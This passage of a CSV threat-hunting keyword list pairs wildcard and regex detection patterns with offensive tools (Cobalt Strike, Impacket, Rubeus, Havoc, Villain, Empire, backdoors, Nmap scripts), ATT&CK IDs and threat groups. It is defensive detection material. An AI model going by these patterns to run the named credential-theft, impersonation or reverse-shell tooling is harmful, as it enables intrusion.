It is heavily adapted from Benjamin Delpy's Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* -hasbootstraphint *",".{0,1000}\s\-hasbootstraphint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* -hashes * -spn * -impersonate 
*",".{0,1000}\s\-hashes\s.{0,1000}\s\-spn\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -hashes lm:nt -gpo-id * -powershell *",".{0,1000}\s\-hashes\slm\:nt\s\-gpo\-id\s.{0,1000}\s\-powershell\s.{0,1000}","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","0","N/A","8","4","305","37","2024-02-18T19:23:57Z","2020-05-10T21:21:27Z" "* --hash-type * --attack-mode *",".{0,1000}\s\-\-hash\-type\s.{0,1000}\s\-\-attack\-mode\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* hashview.py*",".{0,1000}\shashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "* 
hashview-agent *",".{0,1000}\shashview\-agent\s.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "* havoc-client*",".{0,1000}\shavoc\-client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "* hbase-master-info.nse*",".{0,1000}\shbase\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hbase-region-info.nse*",".{0,1000}\shbase\-region\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hddtemp-info.nse*",".{0,1000}\shddtemp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* HiddenDesktop.cna*",".{0,1000}\sHiddenDesktop\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "* HijackDLL-Threads.dll*",".{0,1000}\sHijackDLL\-Threads\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "* hiphp-cli.sh*",".{0,1000}\shiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80's POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "* hiphp-desktop.sh*",".{0,1000}\shiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80's POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "* hnap-info.nse*",".{0,1000}\shnap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --hoax-port *",".{0,1000}\s\-\-hoax\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "* hollow.x64.*",".{0,1000}\shollow\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","257","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" "* --host * --port * --executable *.exe --command *cmd.exe*",".{0,1000}\s\-\-host\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-executable\s.{0,1000}\.exe\s\-\-command\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 
- T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* HostEnum.ps1*",".{0,1000}\sHostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* hostenum.py *",".{0,1000}\shostenum\.py\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "* --host-file *.txt -u * --prompt --admin --no-banner*",".{0,1000}\s\-\-host\-file\s.{0,1000}\.txt\s\-u\s.{0,1000}\s\-\-prompt\s\-\-admin\s\-\-no\-banner.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "* hostmap-bfk.nse*",".{0,1000}\shostmap\-bfk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hostmap-crtsh.nse*",".{0,1000}\shostmap\-crtsh\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hostmap-robtex.nse*",".{0,1000}\shostmap\-robtex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* HostRecon.ps1*",".{0,1000}\sHostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* -Hosts * -TopPorts *",".{0,1000}\s\-Hosts\s.{0,1000}\s\-TopPorts\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Portscan.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* hping3 *",".{0,1000}\shping3\s.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "* http://localhost:8080 -o agent*",".{0,1000}\shttp\:\/\/localhost\:8080\s\-o\sagent.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "* 
http_malleable*",".{0,1000}\shttp_malleable.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* --http-address 127.0.0.1:8181*",".{0,1000}\s\-\-http\-address\s127\.0\.0\.1\:8181.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "* http-adobe-coldfusion-apsa1301.nse*",".{0,1000}\shttp\-adobe\-coldfusion\-apsa1301\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-affiliate-id.nse*",".{0,1000}\shttp\-affiliate\-id\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-apache-negotiation.nse*",".{0,1000}\shttp\-apache\-negotiation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-apache-server-status.nse*",".{0,1000}\shttp\-apache\-server\-status\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-aspnet-debug.nse*",".{0,1000}\shttp\-aspnet\-debug\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-auth.nse*",".{0,1000}\shttp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-auth-finder.nse*",".{0,1000}\shttp\-auth\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-avaya-ipoffice-users.nse*",".{0,1000}\shttp\-avaya\-ipoffice\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-awstatstotals-exec.nse*",".{0,1000}\shttp\-awstatstotals\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-axis2-dir-traversal.nse*",".{0,1000}\shttp\-axis2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-backup-finder.nse*",".{0,1000}\shttp\-backup\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-barracuda-dir-traversal.nse*",".{0,1000}\shttp\-barracuda\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-bigip-cookie.nse*",".{0,1000}\shttp\-bigip\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-brute.nse*",".{0,1000}\shttp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-cakephp-version.nse*",".{0,1000}\shttp\-cakephp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-chrono.nse*",".{0,1000}\shttp\-chrono\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-cisco-anyconnect.nse*",".{0,1000}\shttp\-cisco\-anyconnect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-coldfusion-subzero.nse*",".{0,1000}\shttp\-coldfusion\-subzero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-comments-displayer.nse*",".{0,1000}\shttp\-comments\-displayer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 